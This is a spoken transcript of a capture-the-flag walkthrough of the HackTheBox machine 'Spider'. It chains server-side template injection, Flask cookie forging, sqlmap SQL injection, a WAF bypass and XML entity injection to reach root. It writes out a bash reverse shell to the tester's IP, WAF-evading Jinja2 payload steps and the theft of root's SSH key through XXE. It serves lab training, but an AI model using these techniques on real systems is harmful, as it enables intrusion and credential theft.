What's going on YouTube? This is Ipsec. We're doing Spider from HackTheBox, which is all about the injections. It's got an SSTI server-side template injection. Actually, it has two of those. It also has a SQL injection, structured query language. And then to top it off, it also does XML Entity Injection, which is the extensible markup language. So it starts off with a SSTI that you're limited in using 10 characters for the payload. So you can't really do things that are too malicious like a reverse shell, but you can dump variable names. The variable name you want to dump is config, so you can dump the web application's config, which includes the secret which it uses to sign cookies. If you can sign the cookies, you can change a parameter which is vulnerable to SQL injection to get up to the administrative user of the web app. And as the administrative user, you can do a different SSTI that you're not constrained by characters, but there is a WAF, a web application firewall, preventing a lot of bad strings. So you find out what the WAF filters, build a bypass for it, and get a shell on the box. On the box, you can find out there's a different website running on port 8080 that has an XML injection, but let's just get into the box and start doing this. As always, we're going to start with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it spider, and then the IP address, which is 10.10.10.243. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. Additionally, if we go and Google this, so 76p1, and then what was the other one for Ubuntu 03, and put in Launchpad, it'll tell us exactly what distribution of Ubuntu this is. So this is 76p1 for Ubuntu 03. That looks correct. And it is Bionic, which is Ubuntu 18. So doesn't really help us too much, but we can guess the distribution based upon the banner. And then the next port we have is HTTP on port 80 and is running Nginx. The banner also tells us it's Ubuntu. So off this, I'm thinking, well, it's Nginx, so chances are it's running like Python, Ruby, Node, something like that, because generally those languages I see running off of Nginx, and I more associate like PHP with Apache. It's not always going to be the case, but this is just basic recon, and that is my assumption. We also have spider.htb as a domain name there, but I'm going to go over to the page and see what happens, and it redirects us to spider.htb. So let's add it to our host file. So 10.10.10.243, and we just want to take that off. Oh god, deleted too much there. There we go. And refresh this, and we get a page. Ahmad Furniture. And it just looks like chairs. We have a search, and the keyword, I'm going to search for chair. And ooh, we got a chair. So the very first thing I'm going to do is put a single quote. Doesn't do anything. Going to do a comment after that. And it looks like it broke everything. So if I still saw chairs there, I'd be thinking this was some type of SQL injection. But I don't see anything with that. We could paste this over to SQLMap to run in the background as we go. Wouldn't be a bad idea. If I go to admin, we just get to this login page. We could try testing out some blank SQL stuff. But I'm going to go over to the register. I'm going to try registering with please subscribe. Wants us to confirm our username, which is pretty annoying. I'm going to try the password of password. And we get username cannot be longer than 10 characters. So I'll try ipsec, put the password as password, but I fat fingered that, so go back and fix it. And we get this weird UUID. Log in with password, and we're logged in as ipsec. And doesn't really look like there's anything different. If I go to admin, it directs me back here. If I go to user information, we can see ipsec in my UUID. I'm going to take a look at the cookie. So copy this, echo-n, and my cookie, wait, did not copy the cookie. Echo-n, paste this, and it looks like a long string of characters. If I base64 decode it, we can see it does stuff and then throws invalid input. And I'm guessing this invalid input is coming after this period. I don't know what this piece is, but this is looking very much like a JWT type token. This is probably some type of signature. So it's signing this piece of information. I'm just going to copy up to the first period, and we can do echo-n base64-d, and we don't get that error. So this is probably telling it how it's, this is probably telling it how it's signed, and then this is the actual signature, would be my guess. I actually don't know how this application signs things. But we can see cart items, UUID, and that's about it. So I'm going to go back and see if I can add things to my cart if that change. I guess I can't see items. I did not expect that, so I don't know how I could add it to my cart if I just get internal server error whenever I try to access an item. So the other thing we can try doing, let's click discount, no discounts available. What happens is, what does my browser send actually? So if I go to proxy, intercept, click this, I think that's just straight JavaScript because my browser didn't do anything. So if I go register, and we try registering with some bad characters, so I'm going to do like the double brackets, which is SSTI, a single quote, a double quote, a star, exclamation point, just generic bad characters. Let's just see how the application behaves. So I'm going to log in with password, go here. I can actually, that is bizarre. I did not expect to be able to see details of this. So I added this to my cart. I just want to refresh the page, get my new cookie, and I'm curious if now my cart has an item in it. I'm going to say no because my cookie size did not change. Come on. My clipboard is acting wonky. Echo-n base64-d. Oh, items 1. So it did. It put a 1 there. I was expecting it to have like some item ID, which that is item 1. Let's see. Let's do item 3 as well. So now I have 2 items in my cart. Do we have it going to 2? Yeah, so 1 and 3. So that's how it adds items to the cart. Just again, playing around with how the application looks. If I go to admin, wait, did it log me out? Let's see. That's annoying. Okay. Did not log me out. So I'm still logged in as that. If I go to user information, now I get internal server error. So something in my username made the user information error. And my thought right now is it is one of the single quotes or double quotes because it's probably some type of SQL injection from my user ID to my username. Because in the cookie, the one thing that is missing is username. So somehow the application translates the UUID to a username. And I'm guessing it's doing it through an SQL injection. Or not injection, but SQL query. So let's log out. I'm going to log back in with less bad characters. So I'll just call IP and then do the 2 quotes. Password of password. And let's log in. Go to chair. That's working now. It's weird that it wasn't working before, but it's on video, so I know I'm not crazy. And looking at this, it stripped out the double quote, but we still have the single quote. It did not error at all. So the next thing I want to try is the SSTI. So that's the server-side template injection. So I'm going to do IP, double bracket, password of password, log in, user information, and internal server error. So now we know we have some type of server-side injection, or SSTI. So the very first thing I'm going to try doing is extracting everything. So if I do this was in like Go SSTI, a different box I did for Golang SSTI, and I think this may extract information. Not exactly positive. Oh no, there we go. password. If we go user information, error. So that doesn't do anything. The other thing we could do, we can include variables with this SSTI. So everything in these double brackets is some type of variable. A very common one is config, because everyone names their config. So I'm going to do config. I'm going to do password of password. It can't be longer than 10 characters. Echo-n, config, wcc, that's 12. We can actually get rid of the spaces probably, and that will make it 10. So let's try that. Config, password, log in, go to user information, and now we have the config variable where a username is. So I'm going to do config.var. I don't know what to call it. Maybe text would be a better thing. But we can poke around at this, and I'm going to replace all commas with a line break to make it a bit easier to read. So let's see. Environment is production. Debug mode is turned off. We have a secret key, so we should be able to sign cookies at this point, which could be good. Now, the issue I have right now is my first thought is, oh, great, I can sign a cookie, which means I should be able to edit my username to make an SSTI longer than 10 characters. But again, the username is not in my cookie, so I can't really do that. We have a session lifetime, cookie name. Just looking for other things. So the only thing really interesting in the config is this secret key. And the secret key does let us sign cookies. So my next thought of this is, first I want to just extract this and save. Oh, I did not save. Paste. But save the cookie name. So my thought right now is it's going to be some type of SQL injection still. I still want to go from this user ID to username. And I'm guessing if I create a cookie and put a SQL injection payload in the UUID, then I'll be able to inject into username. At least that's my thought going forward right now. But first, I'm going to do cookie secret and just paste this here so I have it for when I need it. And then a great resource that kind of helps us do this attack is on HackTricks. So I'm going to go to book.hacktricks.xyz, and we're going to search for Flask. So go here, Flask. Oh, and I realize I'm probably skipping over one step of enumeration. If I went back to the cookie, so this config.var, the one thing I did to find out this was Flask, or Python Flask, is I Googled a few things. I'm going to Google like a few just variable names. So Google that. We'll add JSON sort keys in this config. Rate limit storage URL, that sounds good. Let's pick another one. Trap bad request error. So just Googling a bunch of these variable names, and we'll see what comes up. How to keep sorted dictionary, prevent Flask. We got spider. Let's see. Bunch of Flask things coming up with it. So more JSON. If I go to this, this is the Flask-RESTful mentioning what key was this. Google will have it. JSON sort keys is because of this Flask app package. So we can also kind of enumerate the Flask packages that are installed based upon these headers. But we now know this is definitely Flask, so that's why I went and searched Flask on HackTricks, and that probably errored out because I disabled burp while it was going. Come on, there we go. And this is where I learned about the Flask-Unsign package. So I ran pip3 to install this, and then we can play with the Flask cookie. So let's go back to the application, we can grab my whole cookie, and then we can do Flask-Unsign. If you don't have it, again, pip3 install Flask-Unsign. Says it on that web page. And then we can do Flask-Unsign, decode, cookie, and then paste the cookie in. So this gets us what the cookie is. And what we wanted to do was to sign this with something else. So I'm going to do Flask-Unsign, and then we'll do --sign cookie. I'm doing a double quote because I have single quotes in here. And then I'm also going to put a \apostrophe to escape it. And what's the other thing we want? Oh, we need --secret. And then we need to put the cookie. So I'm going to cat cookie.secret. Copy this. Paste that in. And now we have a new cookie. So the one thing I always like doing after I generate cookies is decode them again, just in case I had an issue. In this case, the issue I'd probably have, it's cookie, not cookies, but the issue I'd probably have is around that single quote. But it looks like it did it correctly. So now we have this cookie. So I'm going to go paste this in and see what happens. This page gets us nothing, which is interesting. If I go back here, I can't access the home page anymore. And somewhere on the home page, I think it translated and told me my user. So I'm guessing that's where the error is. We can fully confirm this by now we do the single quote, and then let's put a comment afterwards. And I'm going to paste this cookie in, and let's see if it works. There we go. Logged in as config. So that's why we have that issue. But this definitely allows us to confirm there's SQL injection because we put this single quote in, it errored, we put the comment after the single quote, or the comment after the single quote, so it was now a valid SQL statement, and it worked. So at this point, we should try some type of SQL injection. And if you look at my old videos, this is why I'd write like middleware. If you go to like OXDF straight up, I know he does it still. I'd create a Flask app or a PHP app and put the cookie in a HTTP argument and then send it. I bet if you Google like ipsec.rocks, I know I said Google ipsec.rocks, but if we search middleware, we can find it on this. But the better way to do this is through SQLMap's eval parameter. And again, if we go to this SQLi with and Flask cookie with SQLMap, it shows us how to use this eval. So I'm going to paste the SQLMap in. We want to change it to be spider.htb. And then what this eval is going to allow us to do is run Python code to generate the data. So it's going to generate and put it here. Wherever you have the star, that's like telling SQLMap where to inject to. So we're going from Flask-Unsign, importing the session, and then signing the session. And the one thing we have to change here is this needs to be UUID instead of UID because that's what was in our cookie right here. And if this doesn't work, then I'd also add the cart items to be part of the cookie, but I don't think I need that, so I'm going to leave that out. And then, of course, we need to change the secret. So I'm going to copy this, put it here, and then let's see, the cookie session, that's fine, and --dump is going to dump the database. So custom injection marker, do you want to process it? Yes, we do. And this next one, it's saying you provide an HTTP cookie. However, the URL provides its own cookie. Do you want to merge them? No, we just want to use our own cookie. Do you want to URLEncode cookie values? I don't know this one. I'm going to just go with yes because it was default. And we're going to see exactly what SQLMap finds. I'm guessing it's going to find some type of time-based attack first because it does time before it does union for whatever reason. Maybe because it detects things more often with time-based. I don't know. Header parameter cookie 1, time-based. Do you want to test other DBMSs? Yes, we're going to skip that because it confirmed it was MySQL. We don't need a test for Oracle and things like that. And yes, we want to include all MySQL tests. So now it's going to do union, and it tells us it is vulnerable to union injection. Do you want to keep testing other methods? No, because union injection is the most efficient form of SQL injection. So now we're going to start dumping the database, and oh man, it's done. So we can look at this and see what we have. Looks like a bunch of data. If we go near the top, let's see, this is users, and we have a bunch of users, but one, you can see all my passwords were password, but we have Chiv, and then a password of Chiv was here. So the first thing I'm going to do is try SSHing. So SSH Chiv at spider.htb, and permission denied public key. So I guess we need, let's see, SSH disable public key authentication. Let's see, there should be a -O to disable that. So let's see. Let's try SSHing with this. So SSH that chiv at spider.htb. Okay, so it must only allow public key authentication. The reason why I added those is sometimes SSH will take you attempting keys to be password attempts. And it tries testing every key your SSH client knows about. And there's if it hits the max number of attempts, it may just deny you and not give you a password prompt. So that's why I was trying that. Let's see. I did this. Sounds like configuration. So yeah. So that's the correct arguments to do to bypass that. So what's the password we had? That's in SQLMap still. There we go. Chiv was here. So let's just log into the application with this password. So let's log out. And of course, if you're doing a pen test, this would be a finding. Plain text passwords are bad. And oh, we can't do, wait. Username. I wonder if it's Chiv? No. It says username, but then it says UUID. We should log in with this. Okay, and now we're in the admin panel. So here I'm going to be guessing that we can now do SSTI with longer than 10 characters. So I'm just going to do a new message with double quote, go to messages, and don't see that here, but we have something here. There is a unfinished support portal. So let's check this URL real quick. And this lets us create support tickets. So I'm going to open something in back so we can go back here to view support. And I'm going to revert this box because we have a lot of data in here. So give me a minute to revert. So now I'm reverted, and if I go view support, the dashboard is empty. So I'm going to try putting something here. So root at ibsec.rocks, and just put a message called test. And it hit the WAF because of a bad character period. So I wonder if I can't do email. I'm just going to do ibsec for the contact name, and then do test. And then submit this. Ticket has been posted, and if I go over here, we have the ticket. So let's try doing this again, but this time put a SSTI that we know works, submit, go over here, and we don't have anything. We can try putting SSTI as our username. maybe it's here. If I do test, submit, why do we need these brackets and contact value? Not exactly sure. I'm going to try include config like that. Test. And we got an error message. And nothing worked. So definitely something was interesting here. If I just do that for a payload and send it, it errors. So I think I have some type of SSTI with this. I think if we Google Shavato, I'm probably pronounced that wrong, SSTI, we can go to his blog. And this is a really good read at what we're doing here. But I'm just going to kind of explain it my way. I guess I'm trying to think if I just go payload all the things and grab a payload and then obfuscate it, or we just use his payload because he's going through how to enumerate this block and moving on. But this isn't actually how I did it, so let's try mine. If I get stuck, we'll move to his, because you can always just read that blog post. And I think it's how OXDF did it, because he's the one that pointed me towards that blog post after I did the box. So I'm going to keep going down my logic. So one silly thing here that I didn't notice at first, if we put a bunch of bad characters, like a bunch of special characters in this, the WAF tells us we have multiple bad characters. I didn't know that when doing this box, so this piece may be a bit redundant, but when you start going up against a web application firewall, that's what a WAF stands for, it's not going to be so kind to tell you what the bad characters are. So this is what I do to kind of enumerate bad characters. So the first thing, let's just put a message into Burp Suite so we can copy this. So we need to send this header. So wfuzz-h, paste this in. So now every request has that. And then we need -u for URL. So we can do -u, then HTTP spider.htb, paste that, and then -d for data. And that's where we put this. So I'm going to put the message here. I'm going to put it in single quotes, and then capital fuzz where we want to insert the data, and then -w for word list. I'm going to do opt, seclist, fuzzing, then special characters. And we can see we get a lot of errors, 429. Now, if I actually Googled 429 first, I know exactly what the issue was, but I went down a rabbit hole of encoding because oh, I'm doing special characters. I probably need to do some type of encoding. And I thought if I just did -e, it should list options. Let's see, wfuzz-h, -e, type. List of available encoders. Why did that not list? If I do my full wfuzz and do -e, will it tell me? I don't know exactly how to list all the encoders. Wfuzz list encoders. Turn Burp Suite off. Go to Google. -e. Oh. I can't read apparently. So it wants -e and then wants me to specify what I want. So -e encoders, because I can do payloads, iterators, printers, scripts. Okay. wfuzz-e encoders. And we can see all the various types of encoding we can do. I'm going to do that with ~S, so it prints a bit better. And I'm going to do URLEncode. So how you specify the encoder is whenever you do your word list, you just do comma, and then the encoder you want. So I want to do URLEncode. So now you can see everything is URL encoded, and I'm still getting these pesky 429 errors. So at this point, I Google HTTP error code 429, and we can see it's too many requests. So this is probably the WAF saying, you're sending too much data to me, slow down. So we're going to do just that. I'm going to take the URL encode off since I don't think we need it. I'm going to do -T1. This sets the threads to 1, which slows us down a little bit. We get longer until the 429, but we still see them. So then I'm going to do -S for sleep. I'm going to see if I can sleep for half a second between requests. And we can see it's going much slower, and we're not getting any error messages, which is good. And we can see, I'm going to Control-C this, whenever we have something the WAF doesn't like, it's 1607 characters. So I'm going to do --SC for show characters. Normally I do H to hide things, but in this case, we only care about 1607. So I'm going to do this, and going through, come on. It's going to take a little while because it's hiding every invalid request, but it should show soon which characters are the bad ones. What? Did we get to something bad? That was weird. 1607. -- oh, SH. So SC was looking at the HTTP codes. I saw the C capital, like this is words. So if I did SW, it's going to show me words of 139. SL is going to show me length. No, what is L exactly? Let's go up lines. So lines of 66. H is for characters. It's the second one. So this is how we would see the only bad characters, hopefully. There we go. So we can't use, maybe that's a hyphen and an underscore. A period is also bad. A single quote is bad. Double quote doesn't seem to be bad. But yeah, so that's how we can enumerate the bad characters. So now I go to Payload All The Things, SSTI. And we should find a SSTI injection that looks good to us. So SSTI, server-side template injection. And we can go down. That was enumerating. Jinja 2. Right into remote file. So I think the payload on the website uses this. And dot is a bad character. So I think what it does instead of doing a dot is it puts everything in like this form, which is the same thing apparently in Python. So if we did like this and kept going down, it would work, probably. So popen id.read. So it did something like that. We'd have to change all these single quotes to be doubles, which I was doing. There we go. And then maybe read like that. I'm not exactly sure. If you read the blog post, that may make more sense. But I was going down and I found this one. If I do payload.text, we can paste this in. And this 5F, this is escaping underscore. So if I do man ASCII 5F, we can see that is the hex value for an underscore. And in Python, Python 3, print \x5f, it prints an underscore. So that is why the payload has those, because that's __ global. So that's looking good. We have to replace all the single quotes with double quotes, because that was a bad character. And then we can't do the double brackets, but we can do bracket %. We do that, we just have to have a include. And I'm looking if there's anything else. I don't think so. I'm going to try putting sleep 5. We can cat payload, and then we can send this payload in. If it takes us 5 seconds, we'll be happy. Something tells me I messed up somewhere. I spent a lot of time when doing this piece of the box playing with payloads. So if this works first time, it probably didn't work first time for anyone, and this is just me because I've done the challenge once before. We send this. It's a good sign. Waiting 5 seconds. 4, 3, there we go. So we can see 5,000 milliseconds. I can change that to be 2, and if this goes to 2,000 milliseconds, we're going to be happy. So we are happy. We have code execution through SSTI with this. So the next thing we want to do is send us a reverse shell. And the easiest way to do that is through base64. So I'm going to do echo bash-i dev tcp 10.10.14.8 9001 0 at and 1 base64-w0. Copy this, paste it in. So we'll do echo that base64-d bash nclvnp 9001. Send it. We don't have a shell, but this base64 does have some bad characters of itself because the server's probably taking this plus and translating it to a space. So I'm going to highlight my whole payload, do Control-U to URLEncode the payload, and the server doesn't respond to us, which is a good sign. Python 3-c import pty, pty.spawn, bin bash, get a reverse shell, Control-Z stdy, raw minus echo, fg, enter, enter. You don't see the prompt, but it is typing it. So now we have a shell on this box. Export term to xterm so I can clear it. And now time for the fun stuff. Probably look around this web application to see if we can get a database password. So let's see, if I cat app.py, secret key, we have that. And we have a password for Shivado. So let's try this password. So SSH, we can't SSH with password. We can do SU though. So Shivado. Cat etsy passwd. Grep for SH ending. And Chiv is the user. Oh, we are... Okay, that's not really going to help us too much. We may have the password to ourselves. Sudo-l. Paste. Control-Z. I think I did the right password. Let's just go up and try this again. So, R24. R24. So, sudo-l. Paste. So we do not have the password for Chiv. Okay. So we can go into my home directory. If we go, there is the key, so we can get the user flag. There is also SSH, and we have an IDRSA file. So if we wanted to, we can SSH into this box to get a better shell. And I'd always recommend when you can use SSH, definitely use it. Especially if the key is already there, because that means if you want to take a break, you can take a break, and when you revert the machine, you can go right back where you started. So sh-i chiv.key, chiv at spider.htb. Okay, now we're SSH'd. So let's look at what else is here. We could do MySQL. So the password was, or not the password, the website was in var www. And the other thing we find interesting is there's 8080. There's also game. So we have a second application, it looks like. We LSLA. Game is owned by root. Web app is owned by Chiv. And HTML is empty. So if I go in web app, we can go back into the app. MySQL. We can copy this password. And let's do MySQL -u shavato-p, paste the password, show databases, and right now we just have shop. So what I was hoping to see is game, the other website that is on this box. But it looks like the Shavato user does not have access to it. We could try logging in with root in that password. Access denied. I'm going to try the password of password or something. Still can't get in. So we can't get into game. We could go Etsy, Apache. Actually, it's Nginx, right? Nginx. Sites available. See if there's a way we can access game. So if I go, let's just grep game star. Nothing here. Grep-r game period. So I'm just looking for all the config files that reference game. And I don't see anything. So at this point, let's just access it. So I'm going to do a new line. Actually, before I do that, the keys I hit is that. So new line, squiggly C, and we go down to this SSH prompt. I'm going to do -L to specify a local port forward. And I'm going to specify 8000. So I'm going to listen on my box on 8000. It's going to forward it through this SSH session. And then go to localhost 8080. So now port 8000 on my box is mapped to 8080 of localhost. In theory. Let me turn off Burp Suite and hope it is. Yep. So we got another web app. Password, click. What? That's a troll. That's not a link. But we have a login. Let's intercept this. Where's Burp Suite? Go to Proxy tab. And we can try logging in with a name. Sign in. Logs in with name and sends version 1.0. That's fine. Forward, we can turn intercept off. And we have a page. So my first thing is like try SQL and all the, not SQL, SSTI and all the things. Because if an application is vulnerable to SSTI in one place, it's probably vulnerable in other places. Logout does something. Then we logged in. Okay, nothing. But I have things open in Burp Suite, so when I click and if it goes to a link, it does something. So right now, it looks like this is all just JavaScript on the page because my Burp Suite isn't intercepting it. So the next thing to do is probably look at the cookie this thing gives us. So I'm going to copy this. Let's use that Flask-Unsign thing again. So Flask-Unsign, decode, cookie. That's not it. That is. And we have LXML, which is Python's libxml. Then this is encoded again. Looks like base64 because it ends with equals. So let's decode this in base64. And we have some XML, which is weird. So we got 1.0.0, and if you remembered, back in Burp Suite, we sent that. Let's just send another one. It's easier than finding it sometimes. So let's log out. I'm going to log in with this. Actually, we're going to edit this. So sign in. I'm going to log in with admin. So SSTI payloads will generally require us to be able to do that, which sets a variable. And then I'm going to change this to version, please subscribe. Let's just see what this makes our cookie. So we're logged in. I'm going to grab the cookie again. And we'll do Flask-Unsign, decode, cookie, paste. Then we should decode this, echo-n, base64-d. So we definitely have a SQL Entity Injection right now, because we can change this username to be a variable in XML Entity, and we have injection up here. So what we want to do is close this quote so we can define what the variable goes to. So it's kind of a weird entity injection being able to do it this way, but it works, I guess. So let's log out, and then let's make a login request. I'm just going to do login request with, come on, there's the key. Admin like that. Make sure burp is intercepting. Sign in. And now we want to go back to our web browser and Google up a XML Entity Payload. So let's go back to Payload All The Things, XML Entity Injection. And we have a payload on this page probably. So what we need to do is this. So right here we want to copy this. The only thing we can be changing is this nd test. We're going to put that to admin because that's declaring the variable. So in this version, we want to close out the quote, put this in, and then put a space after those double quotes. I think this will be good, and I can't forget to put admin here. So I'm going to click forward, and I want to show one really stupid thing that I noticed. I'm not sure if it's fixed in a later version of Burp Suite, but if I clicked forward, you'd think I would be able to click on this follow. I'm going to copy this real quick. So it's putting this set cookie thing here, right? So you think if I'd click follow redirection, it would set this cookie for me, but it actually does not. That's an old cookie, right? Because I have much more data in there. So if I send it with this, we would get it. Or if you just used forward, you also go back to the page and can get it. So that is the one big catch when doing it that ate a lot of my time, was figuring out that weird interaction. But now that we can get the pass.tbd file, we could go and grab root.txt. So send that. I should just copy this cookie. And then we'll go to a new pane. Or, let's see. Okay. Follow. And then we can change our cookie. And this. And we can see welcome and then whatever root.txt is. So I'm going to go back here. We can say make cookie. If you didn't know, you can just double click where the number is and then rename. Use cookie. So go back to a make cookie, and we can also try root SSH ID RSA. Grab the cookie. Go to use cookie and paste it in. And we get the SSH key. So I could also copy this and then root.key, paste, chmod 600 root.key, ssh root.key, root at spider.htb, and we get in as root. So that'll be the box. Hope you guys enjoyed it. Take care, and I will see you all next time. Actually, wait a second. I want to see if this uses a database. So let's go var html, not HTML, game. And we can go app.py. This secret key, you're not going to crack that. It's all in hex. I don't see any SQL. grep-ri SQL. MySQL. Let's see, password. Bunch of JavaScript. See, static templates, game.ini. If I look at game.ini, it's using UWSGI. That's just running app. So there's no database on this. Wait. Is this the app? I don't think this is the app. Static. Templates. Yeah, this is not the app. There's something else running on this box. Oh, what is listening on port? Okay, so this became interesting. The easiest way I find to go into working directories is, let's see, let's do lnpt. We should have the PID, right? Maybe A we need. Less dash capital S. PID, peer. Okay. So let's do the same thing. And then we want to grep for 8080. And there's probably a better way to do what I'm doing, but we want PID 1566. So cd proc 1566 cwd. And we're in there. ls static. So let's see. Let's go in templates. Is there a game.html on port 8080? Game.html? No. Let's see. This is confusing me now. Let's get rid of a cookie. Delete. Okay, we can't access site because we're not logged in. Free gift with purchase. This should be something good to search for. grep-r. Oh no, wrong thing. grep-r, free gift with purchase. So it looks like this website was just reskinned. So game.html is really site. And here's where the SSTI, I guess, is. And the username. So, yeah, the game must have just been reskinned. And they just left the things here. If we go into app.py and look at site, we can see site, create XML, that gets login. Where is game? Yeah. So a request on /site is going to render the template game.html, and then it's going to pass it this, which is why we could do SSTI, because it's in the render template, and our get username is pointed to our variables, I believe. So get username, yeah, it's pointing to something we control. Wait, that's not SSTI. This is XML Entity Injection. Maybe this isn't vulnerable SSTI at all, and I've been saying something wrong. But this is a confusing beyond root thing. Hope you guys enjoyed it. Take care, and I will see you all next week.